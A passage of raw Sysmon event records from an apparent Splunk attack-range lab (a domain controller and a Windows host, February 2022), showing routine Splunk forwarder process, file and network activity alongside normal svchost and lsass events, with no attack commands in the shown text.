Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215095Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.316{4F8D34B0-0F6D-6216-1C04-000000003902}2028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000286099Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:47.694{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53300-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286098Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:47.694{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53300-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286097Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:47.680{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53299-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286096Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:47.680{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53299-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000286095Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:49.255{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5611F01D94CF4D8FAB21C6312D3655DC,SHA256=DD7A57145B80E7FEDB692BFF082CEE92B7C5D7017925B20FA7AFE1AD34D50B1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286094Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:49.239{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=18AFC63FDF0F089A398F576388C06F88,SHA256=23F0BBA8DE215678C474659A96434EE97521718D2A3397352964C7826BA4C7AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286093Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:49.208{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A5BA00FB08177F57C79A9BDEA53CA0D5,SHA256=504D4297885A77D0066C5CE4E3192E979C86D939AB674E85C090D709D3E157E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286092Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:49.208{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=147BF6AED78C90D4E8729782945B89A2,SHA256=4014BD6EA7EC1755A05C5079ABEFA9A3CFDC1FF52AD643FD05FFEF4B5D667E2D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286091Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:47.184{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local546dhcpv6-clienttrueff02:0:0:0:0:0:1:2-547dhcpv6-server 354300x8000000000000000286090Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:46.542{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53298-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000215126Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:48.473{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51234-false10.0.1.12-8000- 23542300x8000000000000000215125Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:50.690{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EF70B5A18C47D437CEC17CFCD536854,SHA256=D6090F174095FEFA5DDB6F7C7B57B98D883256B04F1B191CD3627B7A6FA45978,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286103Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:50.520{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=847E60D23BE361822C8D077111ECBE80,SHA256=A65029A3A019508CD695A7FEE0D489B40F529E18C8325A35AB9BE0CED88AAE8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215124Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:50.331{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=164AA784A73D973C14C1BEB4B8F43104,SHA256=D053AF1A0BFA2AFA8F545B03EAD8AB098667F43A866AFCFFFEBF37D983C41E33,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215123Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:50.034{4F8D34B0-0F6D-6216-1D04-000000003902}32803068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286104Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:51.567{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9893C26A4B484B69C00B1C714F9B9BC2,SHA256=34AE0498F218F3643FE0EB877B6776B78C2954C98AC36311586F67356468C79F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215140Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:51.940{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9023F1EF12A3033FA0EC0F8C3EE0BBB6,SHA256=30F7F139AE5BAAF258600AEFFD8B339FC0AC298A2EB95BEED853BC81B079B353,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215139Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:51.487{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0F6F-6216-1E04-000000003902}4020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215138Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:51.487{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215137Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:51.487{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215136Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:51.487{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215135Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:51.487{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215134Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:51.487{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215133Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:51.487{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215132Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:51.487{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215131Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:51.487{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215130Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:51.487{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215129Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:51.487{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0F6F-6216-1E04-000000003902}4020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215128Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:51.487{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0F6F-6216-1E04-000000003902}4020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215127Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:51.488{4F8D34B0-0F6F-6216-1E04-000000003902}4020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215142Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:52.940{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0025D82B4512E0C408E98CB9CE5B2A4,SHA256=0EA63D521C34B910D2FACC4B26E00D9348D14AABD2ED9F36D704447D155A0E00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286105Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:52.583{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=082FE36594AA36BFC92F87D5696BE1C9,SHA256=7070CEF14EB5A1582A6C1656E88CB47F572AABA9BAB857F22683A307EAC9EE30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215141Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:52.690{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3F1BBCA7B3F307CF20448A3C83C82CF8,SHA256=49679EFB56ADC5BA575C9599C2E46324F425BC1A7E1E8184E51DB09548A2739F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215143Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:53.987{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74E21DC86EB226FCC2C9405643EFD2C7,SHA256=B14FF6D3165303A13A0BFCFFB4E6A6B647150C38DE6DAC296CFD623B1B3BBAF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286106Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:53.598{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D58E9C2A22F533160FE04461F9497E8,SHA256=D532DDD38117BB496A9D5164E8F6BDB87E1C4B3D86A63A914C1FC77A20FEE6BD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286113Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:54.817{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL